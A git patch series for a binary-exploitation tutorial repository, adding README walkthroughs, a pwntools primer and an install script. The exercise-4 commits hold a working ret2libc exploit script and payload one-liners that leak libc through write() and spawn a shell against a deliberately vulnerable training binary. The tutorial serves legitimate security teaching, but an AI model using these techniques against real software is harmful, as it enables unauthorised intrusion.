From c684ce039e343c55e3f7947491652cd21ed69f7c Mon Sep 17 00:00:00 2001 From: bert88sta Date: Thu, 26 May 2016 08:19:46 -0400 Subject: [PATCH 01/48] Changes to be committed: modified: README.md new file: exercise-4/.gdb_history new file: exercise-4/peda-session-exercise-4.txt --- README.md | 9 +++++---- exercise-4/.gdb_history | 10 ++++++++++ exercise-4/peda-session-exercise-4.txt | 2 ++ 3 files changed, 17 insertions(+), 4 deletions(-) create mode 100644 exercise-4/.gdb_history create mode 100644 exercise-4/peda-session-exercise-4.txt diff --git a/README.md b/README.md index 86dddb3..c31b0ee 100644 --- a/README.md +++ b/README.md @@ -48,7 +48,8 @@ less painful. It can be installed by running `sudo pip intall pwntools` ##Buffer Overflows and ROP: -* [1: The power of SEGFAULT](exercise-1) -* [2: Build your own `system()`](exercise-2) -* [3: Follow the Yellow Brick Functions](exercise-3) -* [4: Pay a Visit to Your Local Library](exercise-4) +* [1: The power of SEGFAULT](exercise-1) +* [2: Build your own `system()`](exercise-2) +* [3: Follow the Yellow Brick Functions](exercise-3) +* [3.5: Learning pwntools](exercise-3.5) +* [4: Pay a Visit to Your Local Library](exercise-4) diff --git a/exercise-4/.gdb_history b/exercise-4/.gdb_history new file mode 100644 index 0000000..ea0bf60 --- /dev/null +++ b/exercise-4/.gdb_history @@ -0,0 +1,10 @@ +file exercise-4 +disas main +b*main+194 +r < <(python -c 'print "A"*140 + "\x7d\x84\x04\x08" + "A"*148') +x /150wx $esp +x /150wx $esp-0x40 +x /150wx $esp+0x40 +x /150wx $esp-0x40 +x /150wx $esp-0x100 +q diff --git a/exercise-4/peda-session-exercise-4.txt b/exercise-4/peda-session-exercise-4.txt new file mode 100644 index 0000000..39579c8 --- /dev/null +++ b/exercise-4/peda-session-exercise-4.txt @@ -0,0 +1,2 @@ +break *main+194 + From df5b94acd1fa073dd4c0bf100578813702acfb43 Mon Sep 17 00:00:00 2001 From: bert88sta Date: Thu, 26 May 2016 08:59:38 -0400 Subject: [PATCH 02/48] Changes to be committed: modified: README.md --- 
exercise-4/README.md | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) diff --git a/exercise-4/README.md b/exercise-4/README.md index f8b1e65..6ae0e97 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -50,4 +50,38 @@ After 140 bytes, we have `%eip` From here, we need to leak the address of a libc function. +We can do this by calling `write(1,&function,4)` +I'll be using the GOT address of `read()` (remember that the GOT is an array of +pointers into libc) + + +``` +$ objdump -d exercise-4 | grep ">:a" +... +08048370 : +... + +$ objdump -R exercise-4 +... +0804a00c R_386_JUMP_SLOT read +... +``` + +With these addresses, we get the following exploit. + + +``` +python -c 'print "A"*140 + "\x70\x83\x04\x08" + "RETN" + +"\x01\x00\x00\x00"+ "\x0c\xa0\x04\x08" + "\x04\x00\x00\x00"' | ./exercise-4 +``` + +If you go ahead and run this a few times, you'll get some weird outputs: +``` +�+o�Segmentation fault (core dumped) +�kh�Segmentation fault (core dumped) +��n�Segmentation fault (core dumped) +``` + +The four bytes before the SEGFAULT are the libc address. Now this is why we +need pwntools. 
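A rough sketch of the leak payload from the README hunk above, laid out field by field instead of as one escape string. It uses only the addresses shown in the `objdump` output (`0x08048370` for the `write()` stub, `0x0804a00c` for the GOT slot of `read()`); the helper names `p32` and `decode_leak` are local stand-ins defined here for illustration, not part of the patch, and the code is written for Python 3 bytes whereas the tutorial's one-liners are Python 2.

```python
import struct

WRITE_PLT = 0x08048370  # address used for write() in the one-liner above
READ_GOT = 0x0804a00c   # R_386_JUMP_SLOT entry for read(), from objdump -R

def p32(value):
    """Local stand-in: pack a 32-bit value as 4 little-endian bytes."""
    return struct.pack("<I", value)

def decode_leak(leaked):
    """Turn the 4 leaked little-endian bytes back into an integer address."""
    return struct.unpack("<I", leaked[:4])[0]

payload = b"A" * 140        # padding up to the saved return address
payload += p32(WRITE_PLT)   # return into write()
payload += b"RETN"          # placeholder return address for write()
payload += p32(1)           # arg 1: fd 1 (stdout)
payload += p32(READ_GOT)    # arg 2: buffer = GOT slot holding read()'s libc address
payload += p32(4)           # arg 3: number of bytes to write
```

Because the return address after `write()` is the junk value `RETN`, the process still crashes after printing the four bytes, which matches the output shown above.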
From f7623ce53678e6ef3000bcd735a98c4e8ce4aee0 Mon Sep 17 00:00:00 2001 From: Bret Date: Wed, 1 Jun 2016 18:15:01 +0000 Subject: [PATCH 03/48] modified: README.md modified: soln_exercise-4.py --- exercise-4/peda-session-exercise-4.txt | 2 -- 1 file changed, 2 deletions(-) delete mode 100644 exercise-4/peda-session-exercise-4.txt diff --git a/exercise-4/peda-session-exercise-4.txt b/exercise-4/peda-session-exercise-4.txt deleted file mode 100644 index 39579c8..0000000 --- a/exercise-4/peda-session-exercise-4.txt +++ /dev/null @@ -1,2 +0,0 @@ -break *main+194 - From 7c700e4f512dce77e1bcd6b8c99f3d1f877bc803 Mon Sep 17 00:00:00 2001 From: Bret Date: Wed, 1 Jun 2016 18:15:50 +0000 Subject: [PATCH 04/48] modified: README.md modified: soln_exercise-4.py --- exercise-4/.gdb_history | 5 +++++ exercise-4/README.md | 30 ++++++++++++++++++++++++++++++ exercise-4/soln_exercise-4.py | 16 ++++++++++------ 3 files changed, 45 insertions(+), 6 deletions(-) diff --git a/exercise-4/.gdb_history b/exercise-4/.gdb_history index ea0bf60..f108290 100644 --- a/exercise-4/.gdb_history +++ b/exercise-4/.gdb_history @@ -8,3 +8,8 @@ x /150wx $esp+0x40 x /150wx $esp-0x40 x /150wx $esp-0x100 q +p &bss +p &__bss_start +info file +p &__bss_start +q diff --git a/exercise-4/README.md b/exercise-4/README.md index 6ae0e97..0da7322 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -85,3 +85,33 @@ If you go ahead and run this a few times, you'll get some weird outputs: The four bytes before the SEGFAULT are the libc address. Now this is why we need pwntools. + +From here, we're going to run: +``` +$ ldd exercise-4 + linux-gate.so.1 => (0xf76f9000) + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf753c000) + /lib/ld-linux.so.2 (0xf76fa000) +``` + +Since this is a local binary challenge, the libc file is just going to be +whatever the standard one is on your computer. 
**The same binary running on a +different machine could have a different libc.** + +All we have to do is grab a copy of that libc and put it in our directory +If you ever exploit a remote binary anf you don't have the libc, there are +plenty of places you can get them online. +``` +$ cp /lib/i386-linux-gnu/libc.so.6 ./ +``` + +Now we need pwntools. + +We'll start our script off with the typical items: + +```Python +from pwn import * +context(arch='i386', os='linux') # <-- Add the architecture and os +binary = ELF("exercise-4") +libc = ELF("libc.so.6") +``` diff --git a/exercise-4/soln_exercise-4.py b/exercise-4/soln_exercise-4.py index 8e2feae..eaf0c42 100644 --- a/exercise-4/soln_exercise-4.py +++ b/exercise-4/soln_exercise-4.py @@ -6,22 +6,26 @@ write_plt = p32(binary.symbols["write"]) read_plt = p32(binary.symbols["read"]) bss_addr = p32(binary.symbols["__bss_start"]) -print binary.symbols +pop_ret = "\x9d\x85\x04\x08" r=process("./exercise-4") -""" You can use these to test it as a server over localhost - +""" +You can use these to test it as a server over localhost r=remote("127.0.0.1",1337) + + +run this in a different terminal VVVV + socat tcp-listen:1337,fork,reuseaddr exec:"strace ./exercise-4" """ r.recvline() -exploit = "A"*140 -exploit += write_plt + "\x9d\x85\x04\x08" + "\x01\x00\x00\x00"+ "\x0c\xa0\x04\x08" + "\x04\x00\x00\x00" +exploit = "A"*140 +exploit += write_plt + p32(1)+ "\x0c\xa0\x04\x08" + p32(4) exploit += p32(binary.symbols["main"]) r.sendline(exploit) @@ -30,5 +34,5 @@ libc_base = addr_read - libc.symbols["read"] system = p32(libc_base + libc.symbols["system"]) binsh = p32(libc_base + libc.search("/bin/sh").next()) -r.sendline("A"*148+ system + "POOP" + binsh + binsh) # <- 148?????? why 148? +r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148? 
r.interactive() From fc5693373c9d3e3e4c6c345315cba8029631551d Mon Sep 17 00:00:00 2001 From: bert88sta Date: Thu, 2 Jun 2016 15:14:02 -0400 Subject: [PATCH 05/48] Changes to be committed: modified: README.md modified: soln_exercise-4.py --- exercise-4/README.md | 73 +++++++++++++++++++++++++++++++++++ exercise-4/soln_exercise-4.py | 6 +-- 2 files changed, 75 insertions(+), 4 deletions(-) diff --git a/exercise-4/README.md b/exercise-4/README.md index 0da7322..f39bb8e 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -114,4 +114,77 @@ from pwn import * context(arch='i386', os='linux') # <-- Add the architecture and os binary = ELF("exercise-4") libc = ELF("libc.so.6") + +r=process("./exercise-4") +``` + + +after this, we know we'll need the `read()`,`wrte()`, the GOT address of +`read()`, and a `pop ; ret` ropgadget, so we add these in. +```Pyton +write_plt = p32(binary.symbols["write"]) +read_GOT = p32(binary.symbols["got.read"]) +read_plt = p32(binary.symbols["read"]) +bss_addr = p32(binary.symbols["__bss_start"]) +pop_ret = "\x9d\x85\x04\x08" +``` + +Now the binary outputs a line first, so we add + +```Python +r.recvline() +``` + +Now we should start building our exploit. We want to try to avoid using the +escape strings from before, it makes for nicer code and forces you to use +pwntools the right way. + +we add: + +```Python +exploit = "A"*140 # EIP offset +exploit += write_plt +pop_ret + p32(1)+ read_GOT + p32(4) # Call to write() +exploit += p32(binary.symbols["main"]) # Call main() again to retrigger the vulnerability + +``` + +Now we want to send the first payload: + +```Python +r.sendline(exploit) +``` + +Now here's the cool part. Since we know that the program prints out the address +of `read()` in the libc (remember those funky bytes from earlier before the +SEGFAULT?) we can take those and calculate the base address of libc. This +indirectly means that we can call any function in the standard library. 
+ +``` +addr_read = int(r.recv(4)[::-1].encode("hex"),16) +r.recvline() +libc_base = addr_read - libc.symbols["read"] +system = p32(libc_base + libc.symbols["system"]) +``` + +For those unfamiliar with my hacky `addr_read` line, here's what it does. +First, it `recv()`'s 4 bytes. Then, it reverses them (remember the little +endian). Then it takes them and converts them to hex, and parses that as an +integer. Voila, we have the address of `read()` in the libc. From there, we +subtract `read()`s address in the regular libc, giving us the base address for +this runtime. In the last line, we add the offset of `system()` in the libc to +our calculated base. This gives us the address of system for this runtime. + +The best part of this whole show is that the pesky "/bin/sh" string we seem to +keep needing is in the libc! We can calculate the address of that as well! + +``` +binsh = p32(libc_base + libc.search("/bin/sh").next()) +``` + +Now all we've got to do is send our exploit with some extra padding (it was 140 +before, but now it's 148 since we overflow from before the stack frame) and we +get a shell. +``` +r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148? 
+r.interactive() ``` diff --git a/exercise-4/soln_exercise-4.py b/exercise-4/soln_exercise-4.py index eaf0c42..9170f39 100644 --- a/exercise-4/soln_exercise-4.py +++ b/exercise-4/soln_exercise-4.py @@ -4,12 +4,12 @@ libc = ELF("libc.so.6") write_plt = p32(binary.symbols["write"]) +read_GOT = p32(binary.symbols["got.read"]) read_plt = p32(binary.symbols["read"]) bss_addr = p32(binary.symbols["__bss_start"]) pop_ret = "\x9d\x85\x04\x08" - r=process("./exercise-4") """ @@ -18,14 +18,12 @@ run this in a different terminal VVVV - socat tcp-listen:1337,fork,reuseaddr exec:"strace ./exercise-4" - """ r.recvline() exploit = "A"*140 -exploit += write_plt + p32(1)+ "\x0c\xa0\x04\x08" + p32(4) +exploit += write_plt +pop_ret + p32(1)+ read_GOT + p32(4) exploit += p32(binary.symbols["main"]) r.sendline(exploit) From 214aa623cf7f48ba865cc99704972b5620643e71 Mon Sep 17 00:00:00 2001 From: Bret Date: Sat, 4 Jun 2016 15:55:41 +0000 Subject: [PATCH 06/48] new file: README.md --- exercise-3.5/README.md | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 exercise-3.5/README.md diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md new file mode 100644 index 0000000..5f1926d --- /dev/null +++ b/exercise-3.5/README.md @@ -0,0 +1,3 @@ +#pwntools + +####It's pretty great From a900d6441724873f4fbac2df4b2357fd8b556c45 Mon Sep 17 00:00:00 2001 From: Bret Date: Wed, 22 Jun 2016 03:08:33 +0000 Subject: [PATCH 07/48] modified: README.md --- exercise-3.5/README.md | 57 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index 5f1926d..d4b2fd5 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,3 +1,60 @@ #pwntools ####It's pretty great + + +First things first: +``` +from pwn import * +``` + +That's just a generic import statement. + +``` +context(arch='i386', os='linux') +``` + +this just sets the context for other functions that we'll describe later. 
+ + +``` +binary = ELF("some_challenge") +libc = ELF("some_libc") +``` + +This part adds two ELF objects, binary and libc. ELF objects are supremely +useful; they give you access to a wide array of methods and data fields. +I almost always have both of these lines in my script, even if the libc one is +commented out. + + +``` +r=process("./some_challenge") +``` + +This simply executes the challenge (in the same directory.) + +Alternatively: +``` +r=remote("127.0.0.1",1337) #<-- Replace with actual HOST,PORT +``` + +will run it remotely (many CTFs will not give you a full shell, just a host and +a port to connect to the binary) + +Now many of you will remember taking addresses and turning them into python +escape sequences by hand. + +``` +say for example the address of write() in a binary is 0xdeadbeef +\xef\xbe\xad\xde +``` + +would be the resulting python escape. However, pwntools can take care of this. + +``` +write = p32(binary.symbols["write"]) +``` + +this "packs" (converts to the escape seqence, sort of) the address of write for +us on a 32 bit machine. `p64()` also exists, for 64 bit machines. 
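To make the packing step in the README hunk above concrete, here is a minimal sketch of what a 32-bit little-endian pack does, using only Python's standard `struct` module. The names `pack32` and `unpack32` are made up for this illustration; they are meant to mirror the idea behind `p32()`, not to reproduce the pwntools implementation.

```python
import struct

def pack32(value):
    """Pack an unsigned 32-bit integer as 4 bytes, least significant byte first."""
    return struct.pack("<I", value)

def unpack32(data):
    """Inverse of pack32: read 4 little-endian bytes back into an integer."""
    return struct.unpack("<I", data)[0]

packed = pack32(0xdeadbeef)
print(packed)                 # the low byte 0xef comes first, 0xde comes last
print(hex(unpack32(packed)))  # round-trips back to the original value
```

The byte order is the part that is easy to get wrong by hand: on a little-endian machine such as x86 the address is written backwards byte by byte, not nibble by nibble.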
From 7bab892f4b2532c723f14e8c72bcf11db84eb97d Mon Sep 17 00:00:00 2001 From: Bret Date: Wed, 22 Jun 2016 03:10:04 +0000 Subject: [PATCH 08/48] modified: README.md --- exercise-3.5/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index d4b2fd5..55772c1 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,4 +1,5 @@ #pwntools +--- ####It's pretty great From f5bea24821b554eae826546863afba913e92615c Mon Sep 17 00:00:00 2001 From: Bret Date: Wed, 22 Jun 2016 03:11:41 +0000 Subject: [PATCH 09/48] modified: README.md --- exercise-3.5/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index 55772c1..7086264 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,8 +1,8 @@ #pwntools ---- -####It's pretty great +##Attention: This is just an overview RTFM :D +##https://pwntools.readthedocs.io First things first: ``` From de400502fdc6018c4066f65b9f3ef340185db8e9 Mon Sep 17 00:00:00 2001 From: bert88sta Date: Mon, 4 Jul 2016 11:54:38 -0400 Subject: [PATCH 10/48] modified: README.md --- exercise-3.5/README.md | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index 7086264..a875348 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,8 +1,8 @@ #pwntools -##Attention: This is just an overview RTFM :D +##Attention: This is just an overview. -##https://pwntools.readthedocs.io +##RTFM: https://pwntools.readthedocs.io First things first: ``` @@ -59,3 +59,16 @@ write = p32(binary.symbols["write"]) this "packs" (converts to the escape seqence, sort of) the address of write for us on a 32 bit machine. `p64()` also exists, for 64 bit machines. 
+ + +Assuming 'r' is an instantiated process or remote, you can now use these +methods to communicate with the binary + +``` +r.sendline("This sends a string with a newline appended to the end") +r.send("This also sends a string") +``` + +Now me telling you all of this is kind of useless without you getting real +experience. **At this point I would strongly recommend solving the first 3 +challenges using pwntools.** From 8c1b8d79ce271af60fc0e3fc758513c33f83dd7a Mon Sep 17 00:00:00 2001 From: bert88sta Date: Sun, 9 Oct 2016 14:17:43 -0400 Subject: [PATCH 11/48] Added columns to test --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index c31b0ee..7606c4d 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ less painful. It can be installed by running `sudo pip intall pwntools` -##Introductory Tutorials: - -* [Intro 1: What is a binary, really?](intro-1) -* [Intro 2: Screwing around with the stack](intro-2) +|##Introductory Tutorials: |##Recommended Reading| +| || +|* [Intro 1: What is a binary, really?](intro-1) || +|* [Intro 2: Screwing around with the stack](intro-2) || ##Buffer Overflows and ROP: From bd7c3b9d0fcbbd26a9263aa2e6651de49379fb5c Mon Sep 17 00:00:00 2001 From: bert88sta Date: Sun, 9 Oct 2016 14:19:15 -0400 Subject: [PATCH 12/48] Added column --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7606c4d..7a2107b 100644 --- a/README.md +++ b/README.md @@ -42,7 +42,7 @@ less painful. 
It can be installed by running `sudo pip intall pwntools` |##Introductory Tutorials: |##Recommended Reading| -| || +|-------------------------------------------------------|---------------------| |* [Intro 1: What is a binary, really?](intro-1) || |* [Intro 2: Screwing around with the stack](intro-2) || From 55587c09c882b718c9f8a64bca7f29100de74627 Mon Sep 17 00:00:00 2001 From: bert88sta Date: Sun, 9 Oct 2016 14:21:42 -0400 Subject: [PATCH 13/48] added recommended reading --- README.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 7a2107b..463ec3b 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,11 @@ less painful. It can be installed by running `sudo pip intall pwntools` -|##Introductory Tutorials: |##Recommended Reading| -|-------------------------------------------------------|---------------------| -|* [Intro 1: What is a binary, really?](intro-1) || -|* [Intro 2: Screwing around with the stack](intro-2) || +##Introductory Tutorials: +* [Intro 1: What is a binary, really?](intro-1) +** *Recommended Reading:* +** This Link +* [Intro 2: Screwing around with the stack](intro-2) ##Buffer Overflows and ROP: From 5242c0aaee2dffcb14784e037e9e4f5acacd96a1 Mon Sep 17 00:00:00 2001 From: bert88sta Date: Sun, 9 Oct 2016 14:22:53 -0400 Subject: [PATCH 14/48] added read links --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 463ec3b..5496177 100644 --- a/README.md +++ b/README.md @@ -43,8 +43,8 @@ less painful. 
It can be installed by running `sudo pip intall pwntools` ##Introductory Tutorials: * [Intro 1: What is a binary, really?](intro-1) -** *Recommended Reading:* -** This Link + * *Recommended Reading:* + * This Link * [Intro 2: Screwing around with the stack](intro-2) ##Buffer Overflows and ROP: From 40f783125008dfe5d1e3b966a025913cdf825192 Mon Sep 17 00:00:00 2001 From: Harshal Sheth Date: Mon, 19 Dec 2016 15:41:05 -0500 Subject: [PATCH 15/48] fixed spelling --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5496177..0d2e4d5 100644 --- a/README.md +++ b/README.md @@ -31,13 +31,13 @@ I strongly recommend you install and use the following tools to make your life a bit easier: * [longld/peda](https://github.com/longld/peda/): I use this tool in all of - these tutorials. It provides a wide range of useful functions and makes gdb + these tutorials. It provides a wide range of useful functions and makes gdb` far more user friendly. Just follow the install instructions in the repo. * [Gallopsled/pwntools](https://github.com/Gallopsled/pwntools): pwntools is an exploit framework built in my favorite language, python. It has a whole slew of useful functions and chicanery that makes the exploit process more fun and -less painful. It can be installed by running `sudo pip intall pwntools` +less painful. It can be installed by running `sudo pip install pwntools` From bf4607af98329bde196e68eac1750fe8f00469aa Mon Sep 17 00:00:00 2001 From: Harshal Sheth Date: Mon, 19 Dec 2016 15:42:25 -0500 Subject: [PATCH 16/48] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0d2e4d5..b38bbc4 100644 --- a/README.md +++ b/README.md @@ -31,7 +31,7 @@ I strongly recommend you install and use the following tools to make your life a bit easier: * [longld/peda](https://github.com/longld/peda/): I use this tool in all of - these tutorials. 
It provides a wide range of useful functions and makes gdb` + these tutorials. It provides a wide range of useful functions and makes `gdb` far more user friendly. Just follow the install instructions in the repo. * [Gallopsled/pwntools](https://github.com/Gallopsled/pwntools): pwntools is an From 05a5b3e4fdc104dd644ee56752f7aff17621841e Mon Sep 17 00:00:00 2001 From: Santiago Castro Date: Sun, 16 Apr 2017 16:42:05 -0300 Subject: [PATCH 17/48] Fix broken Markdown headings --- README.md | 10 +++++----- exercise-1/README.md | 2 +- exercise-2/README.md | 8 ++++---- exercise-3.5/README.md | 6 +++--- exercise-3/README.md | 6 +++--- exercise-4/README.md | 2 +- intro-1/README.md | 4 ++-- intro-2/README.md | 2 +- terms/README.md | 8 ++++---- 9 files changed, 24 insertions(+), 24 deletions(-) diff --git a/README.md b/README.md index b38bbc4..c28ad87 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -#how2exploit_binary: get your hack on. +# how2exploit_binary: get your hack on. ### A note from the creator @@ -18,7 +18,7 @@ want to dual boot? Get a VM.** bert88sta -##The Grand Glossary of Terms +## The Grand Glossary of Terms I've compiled this list of as many useful things as I could find. It contains all sorts of goodies that I wish I had found or had explained to me earlier. If you have a question, it can probably be answered in here. Otherwise, get your @@ -26,7 +26,7 @@ Google-Fu on * [The Glossary](terms) -##External Tools. +## External Tools. I strongly recommend you install and use the following tools to make your life a bit easier: @@ -41,13 +41,13 @@ less painful. 
It can be installed by running `sudo pip install pwntools` -##Introductory Tutorials: +## Introductory Tutorials: * [Intro 1: What is a binary, really?](intro-1) * *Recommended Reading:* * This Link * [Intro 2: Screwing around with the stack](intro-2) -##Buffer Overflows and ROP: +## Buffer Overflows and ROP: * [1: The power of SEGFAULT](exercise-1) * [2: Build your own `system()`](exercise-2) diff --git a/exercise-1/README.md b/exercise-1/README.md index 40e1966..3f35b04 100644 --- a/exercise-1/README.md +++ b/exercise-1/README.md @@ -1,4 +1,4 @@ -#The power of SEGFAULT +# The power of SEGFAULT **Credit to [PicoCTF 2013](2013.picoctf.com) for problem** diff --git a/exercise-2/README.md b/exercise-2/README.md index 114b3e4..4565bab 100644 --- a/exercise-2/README.md +++ b/exercise-2/README.md @@ -1,13 +1,13 @@ -#Build your own `system()` +# Build your own `system()` Well, life is tough. Unlike in the first overflow exercise, I've made this one so that you can't just call a specific function and get a shell. However, we'll try to solve it anyways. ```C -#include -#include -#include +# include +# include +# include int main(int argc, char **argv) { if (argc>1) { diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index a875348..43af273 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -1,8 +1,8 @@ -#pwntools +# pwntools -##Attention: This is just an overview. +## Attention: This is just an overview. -##RTFM: https://pwntools.readthedocs.io +## RTFM: https://pwntools.readthedocs.io First things first: ``` diff --git a/exercise-3/README.md b/exercise-3/README.md index 34c8a9d..f98ee9a 100644 --- a/exercise-3/README.md +++ b/exercise-3/README.md @@ -1,10 +1,10 @@ -#Follow the Yellow Brick Functions +# Follow the Yellow Brick Functions In this problem, I smartened up. 
Nowhere in the binary will you find "/bin/sh" ```C -#include -#include +# include +# include int main(int argc, char **argv) { putenv("PATH="); printf("I've broken up my system call!\n"); diff --git a/exercise-4/README.md b/exercise-4/README.md index f39bb8e..e95fe67 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -1,4 +1,4 @@ -#Pay a visit to your Local Library +# Pay a visit to your Local Library At this point you're probably used to hunting through binaries for useful functions or code that you can use to get a shell. But what do you do without a diff --git a/intro-1/README.md b/intro-1/README.md index 4076fe7..515177c 100644 --- a/intro-1/README.md +++ b/intro-1/README.md @@ -1,4 +1,4 @@ -#Intro 1: What is a binary, really? +# Intro 1: What is a binary, really? In short, a binary is what happens when you take high level code such as C or C++, and compile it into something the computer can actually run. I believe in @@ -6,7 +6,7 @@ hands on learning, so we can take a look inside one to really find out. Consider the file [hello_world.c](hello_world.c): ```C -#include +# include int main() { printf("Hello World!\n"); } diff --git a/intro-2/README.md b/intro-2/README.md index 6e18907..899f0a8 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -1,4 +1,4 @@ -#Intro 2: Screwing aroung with the stack. +# Intro 2: Screwing aroung with the stack. **Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.** diff --git a/terms/README.md b/terms/README.md index 23b1799..4a30db9 100644 --- a/terms/README.md +++ b/terms/README.md @@ -1,7 +1,7 @@ -#Words, Terms, and Phrases +# Words, Terms, and Phrases -#####This will your dictionary throughout these exercises. If it's not in here, -#####Contact me to ask and I will update it. +##### This will your dictionary throughout these exercises. If it's not in here, +##### Contact me to ask and I will update it. 
## General terms for binaries: @@ -57,7 +57,7 @@ most linux flavors you can call this function with your own arbitrary arguments, you can effectively bypass NX protection -##General Terms +## General Terms **Arbitrary:** This word is used to imply the fullness of control that you might have given an exploit. If you can run *arbitrary* code or read/write From 342306a8404f671d55ec055fb89e8760cc1dbb6c Mon Sep 17 00:00:00 2001 From: sneakerhax Date: Mon, 25 Sep 2017 17:33:18 -0700 Subject: [PATCH 18/48] Fix grammar mistake --- terms/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/terms/README.md b/terms/README.md index 4a30db9..afd5e42 100644 --- a/terms/README.md +++ b/terms/README.md @@ -8,7 +8,7 @@ **Binary:** The binary is the compiled C or C++ file. Anything that is in the binary has a *constant address.* (usually, see PIE) -**libc:** A binary the is *dynamically linked* has a libc file. This means that +**libc:** A binary is *dynamically linked* and has a libc file. This means that the whole set of standard library functions are somewhere in memory to be used by the program From 465fb880207d0a95c30e2eea59983c7f9e205082 Mon Sep 17 00:00:00 2001 From: Bret Date: Fri, 29 Sep 2017 23:49:35 -0400 Subject: [PATCH 19/48] Setting up for some new things --- README.md | 5 +++++ install.sh | 21 +++++++++++++++++++++ 2 files changed, 26 insertions(+) create mode 100755 install.sh diff --git a/README.md b/README.md index c28ad87..59d3f16 100644 --- a/README.md +++ b/README.md @@ -42,6 +42,7 @@ less painful. It can be installed by running `sudo pip install pwntools` ## Introductory Tutorials: +* [Setup Script](./install.sh) * [Intro 1: What is a binary, really?](intro-1) * *Recommended Reading:* * This Link @@ -54,3 +55,7 @@ less painful. 
It can be installed by running `sudo pip install pwntools` * [3: Follow the Yellow Brick Functions](exercise-3) * [3.5: Learning pwntools](exercise-3.5) * [4: Pay a Visit to Your Local Library](exercise-4) + +## Heap Exploitation: + +* More to come here soon ;) diff --git a/install.sh b/install.sh new file mode 100755 index 0000000..de42f3f --- /dev/null +++ b/install.sh @@ -0,0 +1,21 @@ +# Update first +apt-get -y update; + +# Basic Programs that need installed +apt-get -y install gdb; +apt-get -y install gdbserver; +apt-get -y install git; +apt-get -y install python-dev; +apt-get -y install socat; +apt-get -y install vim; +apt-get -y install python-pip; + +pip install capstone; + +# This shouldn't take 3 tries.... +pip install pwntools; +pip install pwntools; +pip install pwntools; + +git clone https://github.com/longld/peda.git +echo "source ~/peda/peda.py" >> ~/.gdbinit From 5c72da146b2dd51291b4c16516f2584c178161a3 Mon Sep 17 00:00:00 2001 From: Bret Date: Fri, 29 Sep 2017 23:56:35 -0400 Subject: [PATCH 20/48] Changed username to match new handle --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 59d3f16..ef021e5 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ want to dual boot? Get a VM.** -Best of luck -bert88sta +[Bretley](https://github.com/Bretley) ## The Grand Glossary of Terms I've compiled this list of as many useful things as I could find. It contains From 8dff99994905d1870ad88f2ad5cf854d3922df7e Mon Sep 17 00:00:00 2001 From: Bret Date: Sat, 30 Sep 2017 01:27:26 -0400 Subject: [PATCH 21/48] Added link to first video + extra setup bit --- README.md | 4 ++-- install.sh | 1 + 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ef021e5..f12b855 100644 --- a/README.md +++ b/README.md @@ -44,8 +44,8 @@ less painful. 
It can be installed by running `sudo pip install pwntools` ## Introductory Tutorials: * [Setup Script](./install.sh) * [Intro 1: What is a binary, really?](intro-1) - * *Recommended Reading:* - * This Link + * [Companion Video](https://youtu.be/6cNbKnxbAWw) + * **Recommended Reading** * [Intro 2: Screwing around with the stack](intro-2) ## Buffer Overflows and ROP: diff --git a/install.sh b/install.sh index de42f3f..5d18434 100755 --- a/install.sh +++ b/install.sh @@ -9,6 +9,7 @@ apt-get -y install python-dev; apt-get -y install socat; apt-get -y install vim; apt-get -y install python-pip; +apt-get -y install gcc-multilib; pip install capstone; From 10c6bae7968da044eae4b1b1804248ab136b2928 Mon Sep 17 00:00:00 2001 From: Bret Date: Sat, 30 Sep 2017 01:30:54 -0400 Subject: [PATCH 22/48] Added reading link to intro-1 --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index f12b855..5f8d0ad 100644 --- a/README.md +++ b/README.md @@ -45,7 +45,7 @@ less painful. It can be installed by running `sudo pip install pwntools` * [Setup Script](./install.sh) * [Intro 1: What is a binary, really?](intro-1) * [Companion Video](https://youtu.be/6cNbKnxbAWw) - * **Recommended Reading** + * [Areece x86 Calling 